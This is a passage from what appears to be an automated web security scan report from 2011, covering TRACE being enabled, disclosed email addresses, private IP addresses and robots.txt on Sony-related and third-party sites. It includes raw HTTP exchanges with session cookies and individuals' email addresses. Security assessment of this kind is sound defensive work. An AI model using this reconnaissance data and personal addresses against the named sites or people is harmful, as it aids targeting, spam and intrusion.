Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.omnitechsupport.com
Cookie: f89c5702c2142a6c

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.omnitechsupport.com
Cookie: f89c5702c2142a6c; model=VGNNR180E


13. Email addresses disclosed
There are 12 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


13.1. http://www.flickr.com/groups/sonycameraclub

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub

Issue detail

The following email address was disclosed in the response:

Request

GET /groups/sonycameraclub HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=0jlvl41706mcf&b=3&s=ij; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:43 GMT; path=/; domain=.flickr.com
X-Served-By: www56.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82289

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...
<a href="/photos/snapoftheshutter/" title="To peter@snapoftheshutter.com's photo page">
...[SNIP]...
<a href="/photos/snapoftheshutter/" title="To peter@snapoftheshutter.com's photo page">peter@snapoftheshutter.com</a>
...[SNIP]...

13.2. http://www.flickr.com/groups/sonycameraclub/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /groups/sonycameraclub/

Issue detail

The following email address was disclosed in the response:

Request

GET /groups/sonycameraclub/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=7i1m6g1706mce&b=3&s=ot; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 22-Jun-2014 15:19:42 GMT; path=/; domain=.flickr.com
X-Served-By: www108.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 82290

<!DOCTYPE html>
<html lang="en-us">
<head>

   <title>Flickr: Sony Camera Club</title>


       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="keywords" content="photograph
...[SNIP]...
<a href="/photos/snapoftheshutter/" title="To peter@snapoftheshutter.com's photo page">
...[SNIP]...
<a href="/photos/snapoftheshutter/" title="To peter@snapoftheshutter.com's photo page">peter@snapoftheshutter.com</a>
...[SNIP]...

13.3. http://www.huddletogether.com/projects/lightbox2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huddletogether.com
Path:   /projects/lightbox2/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:43 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 17:56:45 GMT
ETag: "a0be022-2f25-49ec5804b3140"
Accept-Ranges: bytes
Content-Length: 12069
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   
   <title>Lightbox 2<
...[SNIP]...
<input type="hidden" name="business" value="lokesh.dhakar@gmail.com" />
...[SNIP]...

13.4. http://www.omnitechsupport.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.1.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39435

<html>
<head>
<title>Tech Support | IT Support | Online IT Support - Omnitechsupport.com</title>
<meta name="description" content="Omnitechsupport.com, the nation's leading tech support and IT supp
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.5. http://www.omnitechsupport.com/about.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /about.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.4.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32487

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.6. http://www.omnitechsupport.com/fee.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.7. http://www.omnitechsupport.com/spyware_removal.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /spyware_removal.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /spyware_removal.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.3.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<a href="mailto:support@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...
<input type="hidden" name="business" value="sales@omnitechsupport.com">
...[SNIP]...

13.8. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:48 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6il6pfh1t07e7jh9gcmfdeis73; expires=Sat, 16-Jul-2011 18:53:08 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 23 Jun 2011 15:16:06 GMT
ETag: "73be9325b7928055d2f550e7dc22f698"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

13.9. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 34927
Content-Type: application/x-javascript
Content-Length: 34927
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

// script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

13.10. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 31605
Content-Type: application/x-javascript
Content-Length: 31605
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

// script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

13.11. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; fsr.a=1308841092970

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 14 Dec 2010 00:04:21 GMT
Accept-Ranges: bytes
ntCoent-Length: 36836
Content-Type: application/x-javascript
Content-Length: 36836
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
5trk`F$E)#N=#d($J,(vt#qt`cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p="
+"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`"
+"Q`k`8`4$Ns$90`Ud=^E;
...[SNIP]...

13.12. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYNewsletterOptInView

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/SYNewsletterOptInView

Issue detail

The following email address was disclosed in the response:

Request

GET /webapp/wcs/stores/servlet/SYNewsletterOptInView HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 76256
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 76256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!---->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- AllSitesHeadI
...[SNIP]...
<a href="mailto:mailto:Sony-Electronics@sel.sony.com">Sony-Electronics@sel.sony.com</a>
...[SNIP]...

14. Private IP addresses disclosed
There are 4 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


14.1. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cyberghostvpn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.25
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:28 GMT
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...

14.2. http://www.facebook.com/sonyelectronics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sonyelectronics

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sonyelectronics HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=jVkDTsgSBkZEpRPRjIw6e36G; expires=Sat, 22-Jun-2013 15:19:41 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=rLE1G; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsonyelectronics; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.37
Connection: close
Date: Thu, 23 Jun 2011 15:19:41 GMT
Content-Length: 169018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema
...[SNIP]...

14.3. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; fsr.a=1308841092970

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jun 2011 18:38:05 GMT
Accept-Ranges: bytes
ntCoent-Length: 28134
Content-Type: application/x-javascript
Content-Length: 28134
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

// TEMPORARY FREEZE OVERRIDE
function unFreezePage() {}
function freezePage() {
   popOpen('busyIndicator');
   document.getElementById('busyIndicator').style.cursor = "wait";
   
   var delayedFunction = f
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

14.4. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_home_eventListeners.js HTTP/1.1
Host: www.sonystyle.com
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TS5bbf46=16e18bd3aad35848291e7bce5bac11005e46b2c7608495f34e035480; mbox=check#true#1308841151|session#1308841090453-474854#1308842951; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; sifrFetch=true; fsr.a=1308841092970

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 03 May 2011 21:22:34 GMT
Accept-Ranges: bytes
ntCoent-Length: 20033
Content-Type: application/x-javascript
Content-Length: 20033
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 14:58:12 GMT
Connection: close
Cache-Control: private

/*    SONY | SONY STYLE
*    Homepage JS Functions and Event Listeners
*
*    Author: Steve Rucker, Interactive Developer | B2C CST SAPE Augmentation team | srucker@sapient .com
* Alex Jain, Sr As
...[SNIP]...
<script language=\"JavaScript\" src=\"http://192.168.112.2O7.net/stats_debugger.php\">
...[SNIP]...

15. Robots.txt file
There are 3 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

